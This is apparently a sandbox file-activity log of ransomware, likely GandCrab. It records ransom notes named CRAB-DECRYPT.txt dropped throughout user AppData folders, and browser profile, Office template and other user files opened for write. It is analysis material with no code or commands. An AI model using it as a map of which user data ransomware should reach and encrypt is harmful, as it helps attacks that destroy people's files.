Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328932[[fn=Picture Frame]].glox desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328935[[fn=Picture Organization Chart]].glox desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328940[[fn=Radial Picture List]].glox desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\qU7Og9CaR8xuh.rtf desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328951[[fn=Tabbed Arc]].glox desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328972[[fn=Tab List]].glox desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328975[[fn=Theme Picture Accent]].glox desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\lEAREuPn69.mp4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328983[[fn=Theme Picture Alternating Accent]].glox desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328986[[fn=Theme Picture Grid]].glox desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328990[[fn=Varying Width List]].glox desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\SmartArt Graphics\1033\TM03328998[[fn=Rings]].glox desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\qnnrT9SEOOv4oMd88.jpg desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851216[[fn=apasixtheditionofficeonline]].xsl desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851217[[fn=chicago]].xsl desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851218[[fn=gb]].xsl desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851219[[fn=gostname]].xsl desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\eCV9B6Keul.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851220[[fn=gosttitle]].xsl desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851221[[fn=harvardanglia2008officeonline]].xsl desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851222[[fn=ieee2006officeonline]].xsl desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\pWw3Texk6CwVcTz.odp desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851223[[fn=iso690]].xsl desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851224[[fn=iso690nmerical]].xsl desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\TkryzlAhWDjxy.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851225[[fn=mlaseventheditionofficeonline]].xsl desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\NXOcFmcZH0kfs1V2.xls desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851226[[fn=turabian]].xsl desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Bibliography Styles\TM02851227[[fn=sist02]].xsl desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM01840907[[fn=Equations]].dotx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835231[[fn=Text Cover with TOC (Student Report Blue design)]].docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835232[[fn=Text Cover (Student Report Blue design)]].docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835233[[fn=Text Sidebar (Annual Report Red and Black design)]].docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\cxc1c8A9xEZm1pp.xlsx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835264[[fn=Cover Page (Annual Report Red and Black design)]].docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835265[[fn=Cover Page (Annual Report Timeless design)]].docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835266[[fn=Cover Letter (Chronological Resume Simple design)]].docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835267[[fn=Cover with Logo (Annual Report Red and Black design)]].docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835268[[fn=Photo Cover (Student Report Blue design)]].docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\FsFwfuaCG.csv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835269[[fn=Photo Cover with TOC (Student Report blue design)]].docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835270[[fn=Photo Sidebar (Annual Report Red and Black design)]].docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835271[[fn=Sample Table (Annual Report Red and Black design)]].docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02835272[[fn=Sample Table (Annual Report Timeless design)]].docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM02836362[[fn=Cover letter (Resume Timeless Design)]].docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM03998158[[fn=Element]].dotx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\1F9dzJR3Dq.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\Managed\Word Document Building Blocks\1033\TM03998159[[fn=Insight]].dotx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\o4isx.png desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\Document Themes\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\Document Themes\1033\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\SmartArt Graphics\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\SmartArt Graphics\1033\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\Word Document Bibliography Styles\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\Word Document Building Blocks\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\LiveContent\16\User\Word Document Building Blocks\1033\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\Normal.dotm desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Templates\Welcome to Word.dotx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\2XzzHT1hfS0s9l.docx desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\UProof\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\UProof\CUSTOM.DIC desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Vault\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Word\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Microsoft\Word\STARTUP\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Extensions\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Crash Reports\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Crash Reports\events\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Pending Pings\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create Z:\m9asRMP8HoSL6.avi desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\addons.json desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\addonStartup.json.lz4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\blocklist.xml desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\bookmarkbackups\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\cert8.db desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\compatibility.ini desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\containers.json desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\PlmVZkn.csv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\content-prefs.sqlite desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\cookies.sqlite desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\crashes\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\crashes\events\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\datareporting\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\datareporting\archived\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\datareporting\archived\2017-08\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\datareporting\archived\2017-08\1503651440860.2d520ad0-8005-4317-b4fd-571af846ed8d.new-profile.jsonlz4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\datareporting\archived\2017-08\1503651441015.321b9820-ddf0-4472-8833-27c2104c93fa.main.jsonlz4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\D9xhD4Vtl9zeKaqi.mkv desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\datareporting\archived\2017-08\1503651456011.5f95b583-d699-497d-975d-4dba64e21259.main.jsonlz4 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\diCHxx1R37p96mJV.ppt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\datareporting\session-state.json desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\datareporting\state.json desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\extensions.json desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\favicons.sqlite desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\8KdP1zVgyza2WB4YuYBy.gif desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create Z:\9HqwEbX7Ln7H.wav desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\gmp\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\gmp\WINNT_x86_64-msvc\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\gmp-gmpopenh264\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\gmp-gmpopenh264\1.6\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\gmp-gmpopenh264\1.6\gmpopenh264.info desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\gmp-widevinecdm\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\gmp-widevinecdm\1.4.8.903\\CRAB-DECRYPT.txt desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\gmp-widevinecdm\1.4.8.903\LICENSE.txt desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create Z:\9ZTbafp.mp3 desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ False 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\gmp-widevinecdm\1.4.8.903\manifest.json desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\gmp-widevinecdm\1.4.8.903\widevinecdm.dll.lib desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
Create C:\Users\Nd9E1FYi\AppData\Roaming\Mozilla\Firefox\Profiles\i6gc44p4.default\handlers.json desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ True 1
